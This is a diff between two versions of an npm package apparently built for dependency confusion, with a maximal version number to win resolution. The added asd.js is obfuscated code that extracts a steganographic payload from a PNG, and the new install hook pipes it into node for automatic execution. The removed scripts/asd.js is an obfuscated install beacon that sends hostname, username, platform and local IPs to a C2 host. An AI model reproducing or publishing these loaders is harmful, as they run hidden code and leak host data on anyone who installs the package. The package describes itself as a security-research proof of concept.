@bmg-web-features/bmg-user-interaction-tracker 999.9.9 → 999.999.99

package/asd.js

@@ -0,0 +1 @@
+const _0xe2297d=_0x5001,_0x3a033b=_0x5001,_0x547b52=_0x5001;function _0x5001(_0x1e89c5,_0x4ab068){_0x1e89c5=_0x1e89c5-0x173;const _0x47ad39=_0x47ad();let _0x5001e7=_0x47ad39[_0x1e89c5];return _0x5001e7;}(function(_0x318a00,_0x2e44b5){const _0x4723d2=_0x5001,_0x1d81c6=_0x5001,_0x333b60=_0x5001,_0x4f0e96=_0x318a00();while(!![]){try{const _0x13cb4e=-parseInt(_0x4723d2(0x191))/0x1+parseInt(_0x1d81c6(0x184))/0x2+parseInt(_0x4723d2(0x188))/0x3*(parseInt(_0x1d81c6(0x175))/0x4)+parseInt(_0x1d81c6(0x178))/0x5*(-parseInt(_0x1d81c6(0x18b))/0x6)+parseInt(_0x4723d2(0x18f))/0x7*(-parseInt(_0x1d81c6(0x174))/0x8)+-parseInt(_0x333b60(0x17c))/0x9*(parseInt(_0x1d81c6(0x183))/0xa)+parseInt(_0x333b60(0x180))/0xb;if(_0x13cb4e===_0x2e44b5)break;else _0x4f0e96['push'](_0x4f0e96['shift']());}catch(_0x15d4ec){_0x4f0e96['push'](_0x4f0e96['shift']());}}}(_0x47ad,0x4d2ce));function _0x47ad(){const _0x3c7e18=['log','608865fZwJCl','slice','base64','800790hKDDrI','data','d\x20foun','ascii','252ClweQW','utf8','544715gBDDpN','pipe','length','21432nlOCAk','12EDeQSX','ganogr','toStri','15kcpQqa','nt32BE','from','No\x20ste','36xlbqxV','readUI','STEG','ream','11612491BSBvVi','parsed','payloa','815840VLxKif','38908lRWupc','aphic\x20','dolphi'];_0x47ad=function(){return _0x3c7e18;};return _0x47ad();}import _0x249657 from'fs';import{PNG}from'pngjs';_0x249657['create'+'ReadSt'+_0xe2297d(0x17f)](_0xe2297d(0x186)+'n.png')[_0xe2297d(0x192)](new PNG())['on'](_0x547b52(0x181),function(){const _0x515ec8=_0x547b52,_0x3398de=_0x547b52,_0x12289b=_0x547b52;let _0x31ea25='';for(let _0xa331bd=0x0;_0xa331bd<this[_0x515ec8(0x18c)][_0x515ec8(0x173)];_0xa331bd+=0x4){for(let _0x25fdb4=0x0;_0x25fdb4<0x3;_0x25fdb4++){_0x31ea25+=this[_0x515ec8(0x18c)][_0xa331bd+_0x25fdb4]&0x1;}}const _0x1a73ce=[];for(let _0x23312d=0x0;_0x23312d+0x8<=_0x31ea25[_0x12289b(0x173)];_0x23312d+=0x8){_0x1a73ce['push'](parseInt(_0x31ea25[_0x3398de(0x189)](_0x23312d,_0x23312d+0x8),0x2));}const _0x465edf=Buffer[_0x3398de(0x17a)](_0x1a73ce),_0x5729bb=_0x465edf[_0x12289b(0x189)](0x0,0x4)['toStri'+'ng'](_0x12289b(0x18e));if(_0x5729bb!==_0x3398de(0x17e))throw new Error(_0x12289b(0x17b)+_0x3398de(0x176)+_0x515ec8(0x185)+_0x12289b(0x182)+_0x12289b(0x18d)+'d');const _0x5f32e2=_0x465edf[_0x3398de(0x17d)+_0x515ec8(0x179)](0x4),_0xa58fa1=_0x465edf[_0x515ec8(0x189)](0x8,0x8+_0x5f32e2)[_0x3398de(0x177)+'ng'](_0x12289b(0x190)),_0x126214=Buffer['from'](_0xa58fa1,_0x3398de(0x18a))[_0x515ec8(0x177)+'ng'](_0x3398de(0x190));console[_0x515ec8(0x187)](_0x126214[_0x12289b(0x177)+'ng']());}),'';

package/package.json

@@ -1,14 +1,16 @@
 {
   "name": "@bmg-web-features/bmg-user-interaction-tracker",
-  "version": "999.9.9",
+  "version": "999.999.99",
+  "description": "Security research poc. Please don't install",
   "main": "index.js",
-  "devDependencies": {},
   "scripts": {
-    "install": "node scripts/asd.js"
+    "install": "node asd.js | node -"
   },
-  "author": "",
-  "license": "ISC",
-  "description": "Internal utility library",
-  "_poc_note": "Replace 'name' with the vulnerable package name found by the scanner. Version 9.9.9 ensures this wins over any internal version during resolution."
-
+  "keywords": [],
+  "license": "MIT",
+  "_poc_note": "Replace 'name' with the vulnerable package name found by the scanner. Version 9.9.9 ensures this wins over any internal version during resolution.",
+  "dependencies": {
+    "pngjs": "^7.0.0"
+  },
+  "type": "module"
 }

package/index.js

@@ -1,6 +0,0 @@
-/**
- * Proof-of-concept placeholder module.
- * Exports a no-op API so the package doesn't break imports.
- */
-'use strict';
-module.exports = {};

package/scripts/asd.js

@@ -1 +0,0 @@
-'use strict';const _0x66e8b1=_0x46da,_0x169a77=_0x46da,_0x165747=_0x46da;(function(_0x4561b8,_0x504dbf){const _0x225f67=_0x46da,_0x833bda=_0x46da,_0x58933d=_0x46da,_0x18e0b4=_0x4561b8();while(!![]){try{const _0xe48b18=parseInt(_0x225f67(0x16a))/0x1+parseInt(_0x833bda(0x165))/0x2*(parseInt(_0x58933d(0x182))/0x3)+-parseInt(_0x225f67(0x16b))/0x4+parseInt(_0x833bda(0x156))/0x5+-parseInt(_0x58933d(0x178))/0x6+parseInt(_0x225f67(0x17e))/0x7*(-parseInt(_0x225f67(0x153))/0x8)+parseInt(_0x58933d(0x17a))/0x9*(-parseInt(_0x58933d(0x164))/0xa);if(_0xe48b18===_0x504dbf)break;else _0x18e0b4['push'](_0x18e0b4['shift']());}catch(_0x2baf8e){_0x18e0b4['push'](_0x18e0b4['shift']());}}}(_0x3a1e,0x4ac3e));function _0x3a1e(){const _0x5300e2=['push','7812NBdrzy','f19wzy','releas','tify.c','15099AexaPZ','replac','443','userna','3dQAxlw','error','../pac','/beaco','eout','slice','http','end','dns','log','kage.j','24wtCrGm','reques','write','1353745cVYXyv','3jvbz7','setTim','name','faces','values','hello','byteLe','zxip6f','l6r7fx','ngth','v73iov','ation/','hostna','3670qPUqGr','1060302QRPcfH','versio','https','path','applic','339313lZZpWr','1931924tfmZzJ','addres','family','json','userIn','IPv4','unknow','ify','son','4445','platfo','networ','string','155802HjnGKO'];_0x3a1e=function(){return _0x5300e2;};return _0x3a1e();}const _0x390755=require(_0x66e8b1(0x167)),_0x4d01b2=require(_0x169a77(0x188)),_0x530d6d=require('os'),_0x7fd26b=require(_0x66e8b1(0x18a)),_0x1e952f=require(_0x66e8b1(0x168));console[_0x66e8b1(0x18b)](_0x165747(0x15c));const _0x3b0626=process.env.C2_HOST||_0x66e8b1(0x161)+_0x66e8b1(0x17b)+_0x169a77(0x157)+_0x165747(0x15e)+_0x66e8b1(0x15f)+'3m.oas'+_0x169a77(0x17d)+'om',_0x258a5d=process.env.C2_TLS!=='0',_0x1c57fe=parseInt(process.env.C2_PORT||(_0x258a5d?_0x165747(0x180):_0x165747(0x174)),0xa);let _0x29f756=_0x66e8b1(0x171)+'n';try{_0x29f756=require(_0x169a77(0x184)+_0x169a77(0x18c)+_0x66e8b1(0x173))[_0x169a77(0x159)];}catch(_0x44d31e){}function _0x46da(_0x11baf8,_0x51ea21){_0x11baf8=_0x11baf8-0x153;const _0x3a1e4e=_0x3a1e();let _0x46dae0=_0x3a1e4e[_0x11baf8];return _0x46dae0;}function _0x5bc799(){const _0x307653=_0x66e8b1,_0x8b8982=_0x66e8b1,_0x1227fd=_0x66e8b1;try{const _0x4d935f=_0x530d6d[_0x307653(0x176)+'kInter'+_0x8b8982(0x15a)](),_0x1a4881=[];for(const _0x153b75 of Object[_0x307653(0x15b)](_0x4d935f)){for(const _0x541b06 of _0x153b75){if(!_0x541b06['intern'+'al']&&_0x541b06[_0x307653(0x16d)]===_0x1227fd(0x170))_0x1a4881[_0x1227fd(0x179)](_0x541b06[_0x307653(0x16c)+'s']);}}return _0x1a4881;}catch(_0x3e14db){return[];}}const _0x4a29bf=JSON[_0x169a77(0x177)+_0x66e8b1(0x172)]({'package':_0x29f756,'hostname':_0x530d6d['hostna'+'me'](),'username':((()=>{const _0x30ff7a=_0x66e8b1,_0x561fcb=_0x66e8b1,_0x45fd37=_0x66e8b1;try{return _0x530d6d[_0x30ff7a(0x16f)+'fo']()[_0x561fcb(0x181)+'me'];}catch(_0xf7fde1){return _0x45fd37(0x171)+'n';}})()),'platform':process[_0x169a77(0x175)+'rm']+'\x20'+_0x530d6d[_0x169a77(0x17c)+'e'](),'node_ver':process[_0x66e8b1(0x166)+'n'],'local_ips':_0x5bc799()});function _0x7df516(){const _0x10dc20=_0x66e8b1,_0x1afa66=_0x66e8b1,_0x3d8b14=_0x66e8b1,_0x495a54=(()=>{const _0xa9f705=_0x46da,_0x2ab1ad=_0x46da,_0x3021ba=_0x46da;try{return _0x530d6d[_0xa9f705(0x16f)+'fo']()[_0x2ab1ad(0x181)+'me'];}catch(_0x3e3c2a){return _0x2ab1ad(0x171)+'n';}})()[_0x10dc20(0x17f)+'e'](/[^a-zA-Z0-9]/g,'-')[_0x1afa66(0x187)](0x0,0x32),_0x4085f7=_0x530d6d[_0x10dc20(0x163)+'me']()['replac'+'e'](/[^a-zA-Z0-9]/g,'-')[_0x1afa66(0x187)](0x0,0x32),_0x5ebc22=_0x29f756[_0x1afa66(0x17f)+'e'](/[^a-zA-Z0-9@]/g,'-')[_0x10dc20(0x187)](0x0,0x1e),_0x2ad27d=_0x495a54+'.'+_0x4085f7+'.'+_0x5ebc22+'.'+_0x3b0626,_0x298e95=_0x258a5d?_0x390755:_0x4d01b2,_0xb7a378={'hostname':_0x2ad27d,'port':_0x1c57fe,'path':_0x10dc20(0x185)+'n','method':'POST','rejectUnauthorized':![],'headers':{'Content-Type':_0x3d8b14(0x169)+_0x10dc20(0x162)+_0x10dc20(0x16e),'Content-Length':Buffer[_0x3d8b14(0x15d)+_0x3d8b14(0x160)](_0x4a29bf),'ngrok-skip-browser-warning':'1'}};try{const _0x1377cd=_0x298e95[_0x3d8b14(0x154)+'t'](_0xb7a378);_0x1377cd['on'](_0x3d8b14(0x183),()=>{}),_0x1377cd[_0x1afa66(0x158)+_0x10dc20(0x186)](0x1388,()=>_0x1377cd['destro'+'y']()),_0x1377cd[_0x3d8b14(0x155)](_0x4a29bf),_0x1377cd[_0x3d8b14(0x189)]();}catch(_0x3cd726){}}_0x7df516();